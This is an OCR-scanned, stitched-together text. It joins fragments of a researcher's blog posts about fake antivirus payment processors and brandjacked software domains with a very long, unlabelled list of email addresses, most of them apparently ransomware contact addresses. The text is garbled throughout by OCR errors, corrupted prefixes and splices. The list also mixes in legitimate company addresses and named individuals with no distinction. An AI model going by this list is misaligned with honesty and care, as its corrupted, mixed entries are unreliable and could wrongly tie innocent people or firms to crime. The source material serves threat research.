Our 30-DayMoney Back Ordering - Even Safer = Personal Information are 
Guarantee! Than Over the Phone. private and NEVER resold. 


> ™ + (3 Gs OB 


, Antivirus Plus total: $51.45 
a Product Purchase Form (transaction amount:$49.95, 
activation fee: $1.50) 
Enter your personal details Enter your card information 


(* as it appears on Your card and Your card statement) 


Nome: Cognome: Scegliere # tipo di VISA ¥ 


carta 
Indirizzo: Numero di carta: 
Emittente: 
Stato: Select please v a Select ¥ | Select v 
ZIP/Codice d'avviamento 
postale: 
Paese: United States of America ¥ Cvc2/Cvv2 i 5 
Telefono: 
E-mail: 


Confermare E-mail: 


It’s interesting to point out that so far, none of the hundreds of typosquatted domains is 
taking advantage of a legitimate online payment processor. Instead, they not only self-service 
themselves, but offer to process payments for other participants in the affiliate network. In 
respect to these bogus domains, we have the following payment processors working for them 


secure.softwaresecuredbilling .com (209.8.45.122) registered to Viktor Temchenko (Tem- 
chenkoViktor@googlemail.com) 

secure.goeasybill .com (209.8.25.202) registered to Chen Qing (dophshli@gmail.com) 
secure-plus-payments .com (209.8.25.204) registered to John Sparck (SsparckO00@mail.com) 


Related posts: 

[1]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[2]A Diverse Portfolio of Fake Security Software - Part Twelve 
[3]A Diverse Portfolio of Fake Security Software - Part Eleven 
[4]A Diverse Portfolio of Fake Security Software - Part Ten 
[5]A Diverse Portfolio of Fake Security Software - Part Nine 
[6]A Diverse Portfolio of Fake Security Software - Part Eight 
[7]A Diverse Portfolio of Fake Security Software - Part Seven 
[8]A Diverse Portfolio of Fake Security Software - Part Six 
[9]A Diverse Portfolio of Fake Security Software - Part Five 
[10]A Diverse Portfolio of Fake Security Software - Part Four 
[11]A Diverse Portfolio of Fake Security Software - Part Three 
[12]A Diverse Portfolio of Fake Security Software - Part Two 
[13]Diverse Portfolio of Fake Security Software 


1. http: //ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.htm 
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rahidproject@secmail.pro 
rahidproject@cock.li 
sportdieago@cock.li 
sportdieago@secmail.pro 
padredelicato@secmail.pro 
padredelicato@cock.li 
pskovmama@cock.li 
pskovmama@secmail.pro 
schusterboss@dnmx.org 
schusterboss@cock.|i 
carnovaleimpres@dnmx.org 
carnovaleimpres@cock.li 
numbermskpiter@dnmx.org 
sieldedamorger@dnmx.org 
trueransom@mail2tor.com 
momsbestfriend@protonmail.com 
torrenttracker@india.com 
the.dodger@protonmail.com 
logical.disk@yandex.com 
windows.update@moscowmail.com 
decrypt.my.files@gmail.com 
lechiffre@india.com 
lechiffre@mailchuck.com 
lechiffre@firemail.cc 
crydhellsek@gmail.com 
cryphelp963@gmail.com 
helpsend369@gmail.com 
panerai794@gmail.com 
prosschiff@gmail.com 
7399@sigaint.org 
flsunlocker@yahoo.com 
abennaki@india.com 
transcript@india.com 
deszyfrator.deszyfr@yandex.ru 


maya _157 _ransom@hotmail.com 
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bhacks740@gmail.com 
jOra@protonmail.com 
spOOf3rsuppOrt@protonmail.com 
smartfiles9@yandex.com 
unransom@me.com 
nown@ruggedinbox.com 
motox2016@mail2tor.com 
fantom12@techemail.com 
restorefiles@protonmail.ch 
61fle8055af3f6a672959e6b0493a2@gmail.com 
cstddetnkvcmknI@gmail.com 
decryptioncompany@inbox.ru 
fabianwosar@inbox.ru 
cryptservice@inbox.ru 
cryptsvc@mail.ru 
cryptservice@jabber.ua 
crypt64@mail.ru 
crypt32@jabber.ua 
crypt32@mail.ru 
kevinrobinson@inbox.ru 
decryptgroup@inbox.ru 
decryptgroup@india.com 
decryptgroup@xmpp.jp 
cryptsvc@securejabber.me 
shellexec@protonmail.com 
null _ptr@tutanota.de 

one _weaJc@rows.io 

rep _stosd@protonmail.com 
rep stosd@tuta.io 
youneedmail@bitmai.la 
youneedhelp@mail2tor.com 
support4you@protonmail.com 
esmeraldaencryption@mail.ru 
deposithere@e-mail.ph 
devilguy666@protonmail.com 
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devilguy@sigaint.org 
ea345@sigaint.org 
dj.elton@hotmail.co.uk 
john.perezzka@gmail.com 
lambing.watson@gail.com 
bitcoin666@cock.|i 
apOcalypse@india.com 
adaline.lowell.85@mail.ru 
rozlok@protonmail.com 
t_tasty@aol.com 
pulpy2@cock.li 
pulpy@protonmail.ch 
pulpy@cock.li 

dexp@cock.|i 
stopfilesrestore@bitmessage.ch 
stopfilesrestore@india.com 
suspendedfiles@bitmessage.ch 
suspendedfiles@india.com 
waiting@india.com 
pausa@india.com 
decryption@bitmessage.ch 
decryption@india.com 
decryptiondata@bitmessage.ch 
decryptiondata@india.com 
datadecryption@bitmessage.ch 
datadecryption@india.com 
keypass@bitmessage.ch 


keypass@india.com 


BM-2cUMY5 LWfNRG8jGrWcMzTASeUGX84yX741@bitmessage.ch 


keypassdecrypt@india.com 


decryptionwhy@india.com 


BM-2cUM1HG5NFf9fYMhPzLhjoBdxXqde26iBm2@bitmessage.ch 
BM-2cXonzj9ovn5qdX2MrwMK4j3qCquXBko4h@bitmessage.ch 


savefiles@india.com 


helpshadow@india.com 
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helpshadow@firemail.cc 
restoredjvu@india.com 
restoredjvu@firemail.cc 
pdfhelp@india.com 
pdfhelp@firemail.cc 
blower@india.com 
blower@firemail.cc 
merosa@firemail.cc 
merosadecryption@gmail.com 
vengisto@india.com 
stoneland@firemail.cc 
gorentos@firemail.cc 
ferast@firemail.cc 
varasto@firemail.cc 
gerentosrestore@firemail.cc 
amundas@firemail.cc 
restoredatahelp@firemail.cc 
helpmanager@firemail.cc 
helpmanager@iran.ir 
restoring sup@india.com 
restoring sup@computer4u.com 
restoring reserve@india.com 
zipper@email.tg 
andresaha82@gmail.com 
viastnou.hlavou@mailfence.com 
random _anonymous@gmail.com 
crannbest@foxmail.com 
lanran-decrypter@list.ru 
tom.anderson@india.com 

DE coDER@mail2tor.com 
scryptx@meta.ua 
robert.swat@qip.ru 
helppme@india.com 
hepl1112@aol.com 
some@mail.ru 
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ziz777@gmx.com 
ziz777@india.com 
ursa2277@gmx.com 
ursa2277@yahoo.com 
ursa2277@india.com 
ursa2277@bk.ru 
alexjer554@gmx.com 
alexjer554@india.com 
batary5588@gmx.com 
batary5588@india.com 
batary5588@protonmail.com 
robocript@india.com 
robocript@gmx.us 
robocript@protonmail.ch 
Panzergen552@gmx.de 
Panzergen552@protonmail.com 
Panzergen552@india.com 
vendetta553@gmx.de 
vendetta553@india.com 
vendetta553@protonmail.com 
Filegorillal388@gmx.de 
Filegorillal388@india.com 
Filegorillal1388@protonmail.com 
vine77725@gmx.de 
vine77725@india.com 
vine77725@protonmail.com 
panda7499@gmx.de 
panda7499@india.com 
panda7499@protonmail.com 
jonskuper578@gmx.de 
jonskuper578@protonmail.com 
fox2278@india.com 
fox2278@protonmail.com 
fox2278@gmx.de 


lion7872@protonmail.com 


20837 


lion7872@gmx.de 
lion7872@india.com 
Tizer78224@gmx.de 
filesreturn247@gmx.de 
filesreturn247@india.com 
filesreturn247@protonmail.com 
shieldO@usa.com 
3048664056@qq.com 
patrik.swize@gmx.de 
slanler111@protonmail.com 
help244@ya.ru 
locker@bitmessage.ch 
infokey24@india.com 
decryptmystuff@protonmail.com 
lioghaly@india.com 
kfrvokr@protonmail.ch 
vapeefiles@aol.com 
infocrypt@india.com 
helper@bitmessage.ch 
BM-2cX2s3Zoqw9JFcC9QELpPPPmuKBGRQqF7pL7@bitmessage.ch 
lalabitch2017@yandex.com 
filesrestore@tutanota.com 
wowsmith123456@posteo.net 
muhendis@mail.ua 
muhends@mail.ua 
decr@cock.li 

decrsup@cock.li 

payoff@cock.li 
payoff@bigmir.net 
chines34@protonmail.ch 
oceannew _vb@protonmail.com 
garryhelpyou@qq.com 
garrymagic@tutanota.com 
gladius rectus@aol.com 


gladius _rectus@india.com 
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universe1@protonmail.ch 
universe11@bigmir.net 
payfordecrypt@qq.com 
crypthelp@qq.com 
darkwaiderr@tutanota.com 
darkwaiderr@gmx.de 
decrypt24@protonmail.com 
asdqwer123@cock.li 
assistance@firemail.cc 
goldwave@india.com 
blackworld@cock.li 
fidel_romposo@aol.com 
StormRansomware@gmail.com 
ms.heisenberg@aol.com 
Wecanhelp@protonmail.com 
XXXXXXX @XXXX.XXX 
onion33544@india.com 
redboot@memeware.net 
decryptorx@cock.li 
fuck4u@cock.li 
irmagetstein@india.com 
Jackie7@asia.com 
Jchan@india.com 
hyakunoonigayoru@yahoo.co.jp 
B32588601@163.com 
TheYuCheng@yeah.net 
BaYuCheng@yeah.net 
contactfileszip@email.tg 
contato.arquivoszip@email.tg 
contatoarquivoszip@private-mail.com 
maxicrypt@cock.li 
maxidecrypt@protonmail.com 
nullforwarding@qualityservice.com 
m4zm0v@keemail.me 


JeanRenoAParis@protonmail.com 
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Leviathanl13@protonmail.com 
gentilpascal@bitmessage.ch 
brian.r.goodwin@protonmail.com 
imBoristheBlade@protonmail.com 
gomer@horsefucker.org 
gomersimpson@keemail.me 
johnsonwhate@protonmail.com 
johnsonwhate@tutanota.com 
A654763764@qq.com 
decrypter0O2@cumallover.me 
piterpen02@keemail.me 
jimmtheworm@dicksinmyan.us 
newrecoverybot@pm.me 
sqlbackup3@mail.fr 
doctor666@mail.fr 
newrecoveryrobot@pm.me 
doctor666@cock.li 
repairdb@seznam.cz 
repairdb@mail.fr 
decryptor911@airmail.cc 
decryptor666@420blaze. it 
RemotePChelper@cock.|i 
remotePChelper@tutanota.com 
BCPFILE17@tutanota.com 
returndb@seznam.cz 
returndb@airmail.cc 
support911@cock.|i 
xilttbg@tutanota.com 
doctorhelp2120@cock.li 
repairdatadochelp@airmail.cc 
returndb@airmail.ee 
1lrestOre@protonmail.com 
1restOre@cock.|i 
cryptolifeguard@cock.li 
unlOck@keemail.me 
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8472host@mail.fr 
8472host@cock.|li 
legalrestore@tutanota.com 
SwOrdflsh@cock.|i 
Swordflsh@tutanota.com 
host2021@tutanota.com 
aid.keepcalm@seznam.cz 
aid.keepcalm@protonmail.com 
owerhacker@hotmail.com 
skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
sqqsdr01@keemail.me 
name4v@keemail.me 
dfs20@keemail.me 
styver.goodman@aol.com 
maktoob786@takfir24.net 
haraam@takfir24.net 
haraam@alayam24.net 
blackpanda007@torbox3uiot6wchz.onion 
btc.freshOl@gmail.com 
unixc47@gmail.com 
d3g1d5@gmail.com 
khiwosang@gmail.com 
alpha2018a@aol.com 
ZaszyfrowanePliki@ZaszyfrowanePliki.us 
decry1@cock.li 

decry2@cock.li 


BM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 


ransomware@sj.ms 
randomlocker@tuta.io 
rebushelp@airmail.cc 
rebushelp@protonmail.com 
rebushelper@exploit.im 
cryptghOst@protonmail.com 
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UPDATE: Conduit’s Director of Strategic Marketing Hai Habot contacted me in regard to the 
campaign. Comment published at the bottom of the post. 


Despite my personal reservations towards the use of Google sponsored ads as an emerging 
traffic acquisition tactic [1]on behalf of scammers and cybercriminals - blackhat SEO is getting 
more sophisticated - Google sponsored ads are whatsoever still taken into consideration. 
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ordersupport.de@mycommerce.com 
ordersupport.fr@mycommerce.com 
ordersupport.nl@mycommerce.com 
ordersupport.cn@mycommerce.com 
ordersupport.zh@mycommerce.com 
volcano666@tutanota.de 
help24decrypt@cock.li 
kukanossosanos@onionmail.org 
Support@web.apple.com 

something _ne@india.com 
service@paypal.com 
cryptofiles20202020@protonmail.com 
cryptofiles20202020@cock.li 
service@Gibberishpal.com 


unlockransomware@protonmail.com 
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moneynia0318@goat.si 
desconhecido@criptext.com 
tienesunproblema@cock.|i 
ELLEBOWTALK@my.com 
doyouhaveaproble@cock.li 
SCONOSCIUTA@criptext.com 

jc _finley@yahoo.com 
encrypt2020@outlook.com 
encrypt2020@cock.li 
helpyouhelpyou@cock.li 
helpyou2helpyou@cock.li 
rico@ricostacruz.com 
manager@securitystronghold.com 
submit@securitystronghold.com 


support@sweetim.com 


MAILER-DAEMON@nm30.bullet.mail.sp2.yahoo.com 


seaton.mctavish@yahoo.com 


653905.79556.bm@omp1052.mail.sp2.yahoo.com 


elektricnut@bigpond.com 
careers@incat.com.au 

no _reply@careerone.com.au 
mapenterprises@live.com.au 
whawksworph@skilled.com.au 
nico.smit@bigpond.com 
jmekina@mekinatechnologies.com 
stella.star@telkomsa.net 
seazosurf@yahoo.com 
Perfectlovetemple@gmail.com 
auPlombiren@hotmail.com 
buymeout@onionmail.org 
rkmr121@rediffmail.com 
ravenheim@hotmail.com 
meme71973@hotmail.com 
mundus@newmail.dk 


siongkin@hotmail.com 
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kandagatla_sandeep@yahoo.in 
san _goko@yahoo.com 

sasuke of the uchiha@hotmail.com 
veritasgeek@yahoo.com 
fuckparadise@heniiv.com 
ciastko.zlukrem@gmail.com 
onim72031@yandex.ru 
anonimus.mr@yahoo.com 
airbusbtc@goat.si 
supportperiox@ywtpdnpwihbyuvck.onion 
Cadillac.407@aol.com 
OttoZimmerman@protonmail.ch 
Job2019@tutanota.com 
Raphaeldupon@aol.com 
matrixBTC@keemail.me 
elizabeth67bysthompson@aol.com 
beltoro905073@aol.com 
ofizducwelll988@aol.com 
FobosAmerika@protonmail.ch 
Everest 2010@aol.com 
reply@forgetit.com 
prometheushelp@mail.ch 
judgemebackup@tutanota.com 
JamesGouldiHip@yahoo.com 

mr _chack33@india.com 
maykolinl234@aol.com 
mpa9698@Elive.com 
BigBobRoss@computer4u.com 
bellevueinject@openmailbox.org 
nostrol9@protonmail.com 
garrantydecrypt@airmail.cc 
cryptohitman@yandex.com 
criptote@hmamail.com 
referas@hmamail.com 


terder@hmamail.com 
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utera@hmamail.com 
criptotak@hmamail.com 
umbredecrypt@engineer.com 
umbrehelp@consultant.com 
contacts.spywaretechs@gmail.com 
security@qnap.com 
freefoams@protonmail.com 
krakinrf@yandex.ua 
BI88@onionmail.org 
BI88@reddithub.com 
asstmanager@jacktree.com 
allenyoon@hanmiinc.com 
syspentest@aol.com 
Biger@x-mail.pro 
use _harrd@protonmail.com 
divine@cock.|lu 
online24files@airmail.cc 
un42@protonmail.com 
Paydra@cock.li 
bestdecoding@cock.li 
supportcrypt2019@cock.li 
sitaram108@aol.com 
Vegclass@aol.com 
decrypt@fros.cc 
butters.felicio@aol.com 
wisers.data@gmail.com 
health.pro.demo30@gmail.com 
cce 2020 _final@cce2020.kr 
mutud@airmail.cc 
krasume@tutanota.com 
bepabepababy1@protonmail.com 
document.txt.bepabepababy1@protonmail.com 
bank0OO8800@cock.li 
Files2021@tutanota.com 
helpforyou@firemail.cc 
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mrdoc8869@xmpp.jp 
dfkjhdkjsdjfgkjdsfhkjskdjfhkj@cock.li 
konxnobx@cock.li 
triplock@cock.li 
petro@ctemplar.com 

yaya _captain@aol.com 

yaya captain999@india.com 
Helprecover@foxmail.com 
Andrea. Talbot@bofa.com 
dream _dealer@aol.com 
mssecteam@sigaint.org 
info@bestsecuritysearch.com 
cryptowall51@sigaint.org 
felix _dies@aol.com 
nMerosa@india.com 
FMerosa@india.com 
nmosteros@firemail.cc 
ngorentos@bitmessage.ch 
marat20@cock.li 
vauvau@cock.li 
sabantui@tutanota.com 
udacha@cock.li 
cryz1@protonmail.com 
debora2019@airmail.cc 
Recoverhelp@protonmail.ch 
bitkick@protonmail.com 
crypto.support@aol.com 
ACCUDATA2@tutanota.com 
Babyfromparadise666@gmail.com 
obamausa07@aol.com 
getmyfilesback@airmail.cc 
brbrcodes@gmail.co 
Onecrypt@aol.co 
cmdroot@airmail.cc 


Merd@tutanota.com 
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Mozilla Firefox «www 


Home Download Contact Support 


Description 


Features 


Naturally, the traffic acquisition tactic and the brandjacking of legitimate software are against 
the rules of both Google’s, and Conduit’s terms of use. Interestingly, out of all the adware-ish 
toolbars and affiliate based networks out there, he’s chosen to participate in an affiliate 
network without a flat rate on per toolbar installation basis. Despite the efforts put into the 
typosquatting, the descriptive binaries on a country basis, and the localization of the sites in 
several different languages, he’s failing to monetize the scam in the way he could possibly do 
compared to "fellow colleagues" of his. 
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mirey@tutanota.com 
roomlahC@secmail.pro.cr 
3542516480@qq.com 
Recoverfile@protonmail.com 
Makedonskiy@gmx.com 
samanta@scryptmail.com 
Bnd54@mail2tor.com 

bonum _malum@aol.com.onion 
Deccripted@gmail.com 
Payransom@qq.com 
Funnybtc@airmail.cc 
Usacode@aol.com 
Decisivekey@tutanota.com 
windat@protonmail.com 
Goodbrov@qq.com 
decrypt.guarantee@aol.com 
indus37098@india.com 
SantaGman@criptext.com 
secureserver-eu@protonmail.com 
Tors@tuta.io 
Averiasw@qq.com 
marketing@geeksadvice.com 
restoreadmin@firemail.cc 
norbewebb@gmail.com 
gorentos2@firewall.cc 
helpsupportmanager@airmail.cc 
kniteprince@yahoo.com 
parambingobam@cock.li 
5btc@protonmail.com 
Alexbanan@tuta.io 
Backdata@qq.com 
bizarrio@pay4me.in 
btc@fros.cc 

audit24@qq.com 
Everbe@airmail.cc 
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help@badfail.info 
helpfilerestore@india.com 
Karlosdecrypt@outlook.com 
mr.yoba@aol.com 
MutrOlblackhat@gmail.com 
newsantaclaus@aol.com 
Patagonia92@tutanota.com 
Pponce.lorena@aol.com 
SyndicatexXxXX@aol.com 
noreply-support12961@gmail.com 
uasfbp02309@aol.com 
werichbin@protonmail.com 
cmd@jitjat.org 
dirhelp@keemail.me 
decrypt21@aol.com 
Citrteam@hotmail.com 
rsa2048@cock.|i 
musmansikandar960@g.mail.com 
2021 @onionmail.org 
2022@onionmail.org 
meterpreter@null.net 
godecrypt@tfwno.gf 
codiv2021@tutanota.com 
9ix6@usa.com 
danianci@airmail.cc 
inganebieradze@yahoo.com 
djranarony4@gmail.com 
amr.almekhlafe@gmail.com 
decodeacrux@gmail.com 
decodeacrux@msgsafe.io 
cusapool@firemail.cc 
zezoxo@libertymail.net 
togerpo@zohomail.eu 
raynorzlol@tutanota.com 
raynorzlol@protonmail.com 
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raynorzlol@thesecure.biz 
hackcore55@gmail.com 

dec helper@dremno.com 

dec _helper@excic.com 
Forexexchane@protonmail.com 
China.Helper@aol.com 
greenlite@techmail.info 
dataunlock@criptext.com 
dataunlocks@criptext.com 
bobwhite@msgsafe.io 
bobwhite@cock.|i 
konedieyp@airmail.cc 
databack@qbmail.biz 
kabayaboo@protonmail.com 
axitrun2@cock.|i 
encryptfull@criptext.com 
mrborneo404@gmail.com 
babuckransom@tutanota.com 
metasload2021@protonmail.com 
databang2020@protonmail.com 
Buddy@criptext.com 

bad dev@tuta.io 
bad.dev@onionmail.org 
bentley@icloud.com 
biden@tuta.io 
ClaudiaBarnengham@protonmail.com 
Stephenjoffe@protonmail.com 
Stephenjoffe@tutanota.com 
penkatyjamie@yahoo.com 
valorantskins108@gmail.com 
Benford333@criptext.com 
me.jpg.Benford333@criptext.com 
benford333@protonmail.com 
benford333@tutanota.com 


tormented.soul@tuta.io 
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monster666@tuta.io 
bhatmaker@protonmail.com 
bhatmaker@tutanota.com 
buratin@torbox3uiot6wchz.onion 
buratino2@tutanota.com 
buratino@firemail.cc 
daten@airmail.cc 

daten@cock.li 
harveyjq9freemannll1@gmail.com 
polssh1@protonmail.com 
polssh@protonmail.com 
sofiasqhwellsOgw@gmail.com 
ticketbit@mailfence.com 
ticketbit@tutanota.com 
coincidenceleague@protonmail.com 
backcompanyfiles@protonmail.com 
garantos@mailfence.com 
element444@keemail.me 
decrypt1397cb@protonmail.com 
iskaluz@protonmail.com 
poker021@mailfence.com 
f0138skbeu@gmail.com 
PAYKTER@gmail.com 
charlieSuport@tutanota.com 
recover300dollars@gmail.com 
alphateam56@protonmail.com 
semenov.akkim@protonmail.com 
chichihao@protonmail.com 
veloms@rediffmail.com 
sonuamit555@rediffmail.com 
smenov@bitmessage.de 
citisupport@gmail.com 
uasfbp12309@aol.com 
xmmh@tutanota.com 


supportdata@cock.li 
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supporte@onionmail.org 
xtralords@dnmx.org 
niggchiphoterl974@protonmail.com 
rucetsus@gmail.com 
jackleomp@tuta.io 
crack.hack.black@gmail.com 
poytemol@gmail.com 
peloment@tutanota.com 
uenwonken@memail.com 
tybn138shap@gmail.com 
revilsupport@privatemail.com 
Citrteam@yahoo.com 
citrteam@tutanota.com 
citrteam@gmail.com 
mending7788@protonmail.ch 
databankasi@bk.ru 
rottencurd@vivaldi.net 
datos@msgsafe.io 
death@firemail.cc 
deathransom@airmail.cc 
22eb6687475f2c5ca30b@protonmail.com 
Decryptioncenter2016@gmail.com 
backupcenter2016@gmail.com 
photo.jpg.deltapaymentbitcoin@gmail.com 
table.xlsx.deltapaymentbitcoin@gmail.com 
Deus69@protonmail.com 
Deus69@tutanota.com 
harlesetta.embody@aol.com 
charlesetta.embody@aol.com 
deltatechit@protonmail.com 
decryptex2@airmail.cc 
cynthia-it@protonmail.com 
btpsupport@protonmail.com 
DouariX@tutanota.com 
DouarixX@cock.li 
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keydoyuk@gmail.com 
ForHelp@cock.li 
ballxball@protonmail.com 
dokulus2@firemail.cc 
Sacura889@tutanota.com 
decphob@tuta.io 
chinadecrypt@fasthelpassia.com 
wiruxa@airmail.cc 
yongloun@tutanota.com 
anygrishevich@yandex.ru 
qirapoo@firemail.cc 
dozusopo@tutanota.com 
unlockfile@firemail.cc 
files@restore.ws 
jawadawan939@gmail.com 
amal5190@gmail.com 

nhands _q647t@pudxe.com 
iomega@cock.li 
redepsilonsupport@protonmail.com 
diniaminius@winrof.com 
soterissylla@wyseil.com 
fairexchange@qq.com 
Adamfox69@criptext.com 
adamfox69@aol.com 
adamfox69@tutanota.com 
miliantor@mailfence.com 
emilianazizi@tutanota.com 
emiliantor@mailfence.com 
yourfiles1@tutanota.com 
55billy777@mail.fr 
getacrypt@airmail.cc 
FilesRecoverEN@Onionmail.org 
GetYourFilesBack@protonmail.com 
grejkugulik@onionmail.org 
grejkugulik@msgsafe.io 
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mediatorforyou@mail.fr 
cloud@mail2pay.com 
help24@nerdmail.co 
harditem@firemail.cc 
harditem@xmpp.jp 
decryptioner@uncryptfile.com 
hobbsadelaide@aol.com 
savemydata@qq.com 
afuihefwfi3891@gmail.com 
microsoftsupportl190@aol.com 
niranjannitinmulik@gmail.com 
hpjar@protonmail.ch 
sploitmeta@mailfence.com 
lizscudata@tutanota.com 
j3stertools@gmail.com 
JordankKelly@onionmail.org 


tommyshanahan@tutanota.com 


richardwafflespencer1982@protonmail.com 


AllenPool1987@onionmail.org 
DerekWillson19878@protonmail.com 
JeremySaylor1987@tutanota.com 
AllenPool1967@onionmail.org 
karenkhonsari@gmail.com 
michaeldrumman1977@tutanota.com 
jamescowworkingsal1988@tutanota.com 
michaeldrumman1977@protonmail.com 
kikiriki@creep.im 
gangflsbang@protonmail.ch 
blablacar@airmail.cc 
badlamadec@gmail.com 
badlamadec@mailfence.com 
keysell88@gmail.com 
keysell88@criptext.com 
Dwightschuh@tutanota.com 


Joannbeavers@protonmail.com 
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Ralphshaver@onionmail.org 
LegionLocker@mail2tor.com 
pewpew@tuta.io 
lizardcrypt@msgsafe.io 
suppdecrypt@cock.li 
yourdata@RecoveryGroup.at 
Marco88Polo@criptext.com 
Marco88Polo@aol.com 
Marco88Polo@tutanota.com 
akzhq1010@tutanota.com 
akzhq1010@cock.|i 
mallox.israel@mailfence.com 
mallox@tutanota.com 
recohelper@cock.li 
selawilsen2021@tutanota.com 
dennisdgalih35@tutanota.com 
josephpehrhart@protonmail.com 
RestorFile@tutanota.com 
sergiocollege123@gmail.com 
pvnkmr17@gmail.com 
grounded2019MEMZ@cock.li 
iamcanhelpyou@tuta.io 
mikolio@cock.li 
MarkEvans333@criptext.com 
daterestore@iran.ir 
helprestore@firemail.cc 
mOabsupport@protonmail.ch 
oceanm@engineer.com 
Lorentzen@writeme.com 
AugustSteen@writeme.com 
oceanm@india.com 
lorentzen@india.com 
auguststeen@india.com 
moloch _helpdesk@tutanota.com 
moloch _helpdesk@protonmail.ch 
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apoyo2019@protonmail.com 
moondog@onionmail.org 
moondog@msgsafe.io 
don.h@free.fr 
Tuko.Salamanca@mailfence.com 
TucoSalamanca@elude.in 
ncov2020@aol.com 
jewkeswilmer@aol.com 
mr.helper@qq.com 
nathakorn.jack@gmail.com 
elzmflqxj@tutanota.de 
andre.spadari@gmail.com 
dulithagamnem@gmail.com 
jawlnciacm3124@aol.com 
nomad.crypt@msgsafe.io 
pingpOng@tuta.io 
tcprx@tutanota.de 
millenisO00@qq.com 
support@imfoodst.com 
support@securycasts.com 
back _me@foxmail.com 
paracrypt@cock.li 
p4r4l0ck@tutanota.com 
Lhelpman@inboxhub.net 
embulance@cock.|i 
popca@qq.com 
filemgr@tutanota.com 
bankinter.promo@protonmail.com 
poker021@tutanota.com 
recovery Potes@firemail.de 
team-assistO0O2@pm.me 
prometheushelp@airmail.cc 
Prometheus.help@protonmail.ch 
81r302dsj801@aol.com 
r1731gf37@gmail.com 
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ragnarOk@tutanota.com 
ragnarok recover@secmail.pro 
r19narOk@airmail.cc 
razer1115@goat.si 
moncler@tutamail.com 
skafridis8@gmail.com 
arq.ethelweard@icloud.com 
sbrenergy@gmail.com 

my _photo.jpeg.restorel19@cock.li 
report.xlsx.restorel9@cock.li 
unlockvt@india.com 
RestoreFile@protonmail.com 
RestoreFile@qq.com 
retools@eml.cc 

retools@mm.st 
jamesbond2021@tutanota.com 
xsmaxs@tutanota.com 
xsmaxs@aol.com 
helpisos@aol.com 
theonlyoption@qq.com 
tvakram2013@gmail.com 
ransom.me@onionmail.org 
ransom.me@msgsafe.io 
bexonvelia@aol.com 
darkjon@protonmail.com 
poolhackers@tutanota.com 
eternalnightmare@tutanota.com 
John.Karick@mailfence.com 
rublytrojan@gmail.com 
fufgod1232@gmail.com 
unlockfiles2021@cock.li 
ghostdog@msgsafe.io 
mangerman@firemail.de 
assistant@firemail.de 
sckmedady@protonmail.com 
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Brandjacked software domains part of the AdWords campaign : 


adobe-reader-co .com 
adware-co .com 
flash-player-co .com 
paint-shop-pro .com 
winrar-co .com 
ccleaner-co .com 
firefox-co .com 
avi-codec-co .com 
guitar-pro-co .com 
codec-co .com 
opera-co .com 
messenger-comp .com 
servicepack-co .com 
azureus-co .com 
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bittorrent-co.com 

o.com 
bittorrent-co.com 
bittorrent-co,com 
bittorrent-co.com 
bittorrent-co,com 


ev1s-209-8% 


evis-20 


heplanet.com 
.theplan 
.theplanet.com 
wtheplanet.com 


heplanet.com 
.theplanet.com 
theplanet.com 
.theplanet.com 
heplanet.com 
heplanet.com 


wtheplanet.com 
2, theplanet.com 


2. theplanet.com 


theplanet.com 
theplanet.com 


2, theplanet.com 
2. theplanet.com 
2. theplanet.com 
heplanet.com 
theplanet.com 
.theplanet.com 
.theplanet.com 
.theplane 
1eplanet.com 
2 theplanet.com 


*-reader-co.com 
adware-co,com 
flash-player-co,com 
paint-shop-pro.com 
winrar-co,com 


-co.com 
yvirtualdj-co.com 
zattoo-co,com 
clonecd-co.com 
tuneup-co.com 


orer-co.com 


paint-net- 


download-acelerator.com 


decrypt4data@protonmail.com 
ShadowofDeath@elude.in 
rehab-file@seznam.cz 
Kelly.lb@protonmail.com 
spyderman@onionmail.org 
apollo55@lenta.ru 
starter@cumallover.me 
lisbeth.witton@aol.com 
monito001@mailfence.com 
evolution@firemail.cc 
datarecovery@asiarecovery.ir 
recoverfiles@ctemplar.com 
recoverfilesquickly@ctemplar.com 
primethetime@protonmail.com 
tesla369@cock.li 
teslacrypt369@cyberfear.com 
emailme4554@tutanota.com 
emailme4554@goat.si 
TomGate33@criptext.com 
TomGate33@yahoo.com 
TomGate33@tutanota.com 
kinddoctor@airmail.cc 
fishersam1188@tutanota.com 
tortoisesupport@protonmail.com 
gthekey@aol.com 
tuzadiea@msgsafe.io 
gudixaxa@yahooweb.co 
umbrella cor@zohomail.eu 
vapotin@tuta.io 
restorefiles@elude.in 
DanKult@onionmail.org 
AmbroVirerra@onionmail.org 
v-society.official@onionmail.org 
Recoverydata54@protonmail.com 
ancrypted1@gmail.com 
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cmd _bad@keemail.me 
hostcmd@tutanota.com 

clay whoami _1@protonmail.ch 
winhelp@cryptolab.nl 
whizoze@gmail.com 
whizoze@tutanota.com 
u0441leverhorse@ctemplar.com 
fullrestore@qq.com 
leverhorse@ctemplar.com 
ykup@tutanota.com 
nsupport@imfoodst.com 
nsupport@securycasts.com 
ncmd@jitjat.org 
ndirhelp@keemail.me 

ndec helper@dremno.com 
ndec _helper@excic.com 
ngorentos@firemail.cc 
nencrypt2020@outlook.com 
nencrypt2020@cock.|i 
nprometheushelp@mail.ch 
nprometheushelp@airmail.cc 
nPrometheus.help@protonmail.ch 
u201ccitisupport@gmail.com 
u201cuasfbp12309@aol.com 
u201cnoreply-supportl12961@gmail.com 
u201cuasfbp02309@aol.com 
nxtralords@dnmx.org 
nferrari@msgsafe.io 
nWhiteblackgroupO02@gmail.com 
nBENTLEY@icloud.com 
fastgabril@protonmail.com 
hertzgabril@aol.com 
satanishere@tutanota.com 
satanishere@cock.|i 


satanwashere@cock.|i 
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crxlI@hackorans.com 

crxl@cock. |i 

supportfonix@criptext.com 
suportfonix@tutanota.com 
supportfonix@cock.li 
nbannedlands@msgsafe.io 
nbad.dev@onionmail.org 
nvarasto@firemail.cc 
nrestoremanager@airmail.cc 
ndiniaminius@winrof.com 
nsoterissylla@wyseil.com 
nmichaeldrumman1977@tutanota.com 
njamescowworkingsal988@tutanota.com 
nmichaeldrumman1977@protonmail.com 
nselawilsen2021@tutanota.com 
ndennisdgalih35@tutanota.com 
njosephpehrhart@protonmail.com 
nmangerman@firemail.de 
nassistant@firemail.de 
noceanm@engineer.com 


noceanm@india.com 


my _photo.jpeg.cryptonation92@outlook.com 


report.xlsx.cryptonation92@outlook.com 
nDwightschuh@tutanota.com 
nJoannbeavers@protonmail.com 
nRalphshaver@onionmail.org 

numbrella _cor@zohomail.eu 
